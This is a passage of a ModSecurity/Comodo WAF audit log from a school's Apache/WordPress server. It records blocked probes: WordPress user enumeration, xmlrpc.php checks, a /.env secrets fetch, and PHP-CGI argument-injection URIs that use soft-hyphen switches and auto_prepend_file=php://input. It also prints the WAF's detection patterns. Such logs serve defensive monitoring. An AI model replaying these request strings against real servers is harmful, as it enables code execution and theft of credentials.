https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31165f71-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453726572745 4845 (- - -) Stopwatch2: 1747453726572745 4845; combined=3867, p1=431, p2=3115, p3=23, p4=25, p5=150, sr=67, sw=123, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31165f71-Z-- --7dafb663-A-- [17/May/2025:10:49:03 +0700] aCgHL3yxdQCiyU1ENFcruAAAAAA 103.236.140.4 51184 103.236.140.4 8181 --7dafb663-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7dafb663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dafb663-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453743494764 2842 (- - -) Stopwatch2: 1747453743494764 2842; combined=1232, p1=436, p2=767, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dafb663-Z-- --2f96af4d-A-- [17/May/2025:10:49:10 +0700] aCgHNgTOsBn9MSWb6WJwKQAAAIM 103.236.140.4 51188 103.236.140.4 8181 --2f96af4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f96af4d-C-- demo.sayHello --2f96af4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f96af4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453750411850 6487 (- - -) Stopwatch2: 1747453750411850 6487; combined=4690, p1=625, p2=3827, p3=38, p4=42, p5=96, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f96af4d-Z-- --5fed524b-A-- [17/May/2025:10:50:37 +0700] aCgHjem4kjNN-hEbWjJDbgAAAFM 103.236.140.4 51196 103.236.140.4 8181 --5fed524b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5fed524b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fed524b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453837455788 3255 (- - -) Stopwatch2: 1747453837455788 3255; combined=1429, p1=502, p2=895, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fed524b-Z-- --6c04b42e-A-- [17/May/2025:10:50:50 +0700] aCgHmhKi5m5upc8uMd6jnQAAANU 103.236.140.4 51200 103.236.140.4 8181 --6c04b42e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c04b42e-C-- demo.sayHello --6c04b42e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c04b42e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453850487144 5656 (- - -) Stopwatch2: 1747453850487144 5656; combined=4116, p1=548, p2=3348, p3=31, p4=34, p5=92, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c04b42e-Z-- --8bffbb58-A-- [17/May/2025:11:02:35 +0700] aCgKWwTOsBn9MSWb6WJwLQAAAI0 103.236.140.4 51260 103.236.140.4 8181 --8bffbb58-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 156.255.1.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 156.255.1.144 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8bffbb58-C-- --8bffbb58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8bffbb58-E-- --8bffbb58-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747454555189559 4763 (- - -) Stopwatch2: 1747454555189559 4763; combined=3003, p1=507, p2=2461, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bffbb58-Z-- --209c774a-A-- [17/May/2025:11:36:31 +0700] aCgSTwTOsBn9MSWb6WJwZwAAAJU 103.236.140.4 51492 103.236.140.4 8181 --209c774a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --209c774a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --209c774a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747456591414140 3533 (- - -) Stopwatch2: 1747456591414140 3533; combined=1468, p1=483, p2=947, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209c774a-Z-- --ba80da1f-A-- [17/May/2025:11:36:39 +0700] aCgSVwTOsBn9MSWb6WJwaQAAAJg 103.236.140.4 51496 103.236.140.4 8181 --ba80da1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ba80da1f-C-- demo.sayHello --ba80da1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba80da1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747456599658446 6566 (- - -) Stopwatch2: 1747456599658446 6566; combined=4612, p1=608, p2=3812, p3=32, p4=35, p5=74, sr=80, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba80da1f-Z-- --d13f1874-A-- [17/May/2025:11:41:02 +0700] aCgTXhKi5m5upc8uMd6jrAAAAMA 103.236.140.4 51558 103.236.140.4 8181 --d13f1874-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d13f1874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d13f1874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747456862517705 805 (- - -) Stopwatch2: 1747456862517705 805; combined=327, p1=274, p2=0, p3=0, p4=0, p5=53, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d13f1874-Z-- --202f335c-A-- [17/May/2025:11:54:14 +0700] aCgWdnyxdQCiyU1ENFcr3AAAAAA 103.236.140.4 51668 103.236.140.4 8181 --202f335c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --202f335c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --202f335c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747457654008727 2813 (- - -) Stopwatch2: 1747457654008727 2813; combined=1237, p1=441, p2=767, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --202f335c-Z-- --6e894012-A-- [17/May/2025:11:54:20 +0700] aCgWfATOsBn9MSWb6WJwhAAAAJg 103.236.140.4 51672 103.236.140.4 8181 --6e894012-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e894012-C-- demo.sayHello --6e894012-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e894012-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747457660762946 6681 (- - -) Stopwatch2: 1747457660762946 6681; combined=4761, p1=598, p2=3883, p3=38, p4=43, p5=129, sr=98, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e894012-Z-- --9025d076-A-- [17/May/2025:12:05:23 +0700] aCgZE-m4kjNN-hEbWjJDmAAAAEE 103.236.140.4 51742 103.236.140.4 8181 --9025d076-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9025d076-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9025d076-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747458323059406 3290 (- - -) Stopwatch2: 1747458323059406 3290; combined=1390, p1=478, p2=881, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9025d076-Z-- --76519011-A-- [17/May/2025:12:05:28 +0700] aCgZGOm4kjNN-hEbWjJDmgAAAEQ 103.236.140.4 51746 103.236.140.4 8181 --76519011-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76519011-C-- demo.sayHello --76519011-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76519011-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747458328311790 4706 (- - -) Stopwatch2: 1747458328311790 4706; combined=3644, p1=461, p2=2982, p3=23, p4=26, p5=90, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76519011-Z-- --7d422167-A-- [17/May/2025:12:16:07 +0700] aCgbl-m4kjNN-hEbWjJDqwAAAFA 103.236.140.4 51800 103.236.140.4 8181 --7d422167-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d422167-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d422167-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747458967841718 2930 (- - -) Stopwatch2: 1747458967841718 2930; combined=1266, p1=454, p2=780, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d422167-Z-- --f2955740-A-- [17/May/2025:12:16:13 +0700] aCgbnem4kjNN-hEbWjJDrQAAAFI 103.236.140.4 51804 103.236.140.4 8181 --f2955740-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f2955740-C-- demo.sayHello --f2955740-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2955740-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747458973483763 5402 (- - -) Stopwatch2: 1747458973483763 5402; combined=4025, p1=546, p2=3261, p3=29, p4=34, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2955740-Z-- --f79b6e37-A-- [17/May/2025:12:22:10 +0700] aCgdAnyxdQCiyU1ENFcr5QAAABA 103.236.140.4 51908 103.236.140.4 8181 --f79b6e37-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --f79b6e37-C-- --f79b6e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79b6e37-E-- --f79b6e37-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747459330435512 3931 (- - -) Stopwatch2: 1747459330435512 3931; combined=2162, p1=529, p2=1599, p3=0, p4=0, p5=34, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79b6e37-Z-- --a6d5cd4a-A-- [17/May/2025:12:28:40 +0700] aCgeiOm4kjNN-hEbWjJD3wAAAEY 103.236.140.4 51954 103.236.140.4 8181 --a6d5cd4a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a6d5cd4a-C-- --a6d5cd4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6d5cd4a-E-- --a6d5cd4a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747459720437017 5067 (- - -) Stopwatch2: 1747459720437017 5067; combined=3234, p1=545, p2=2650, p3=0, p4=0, p5=38, 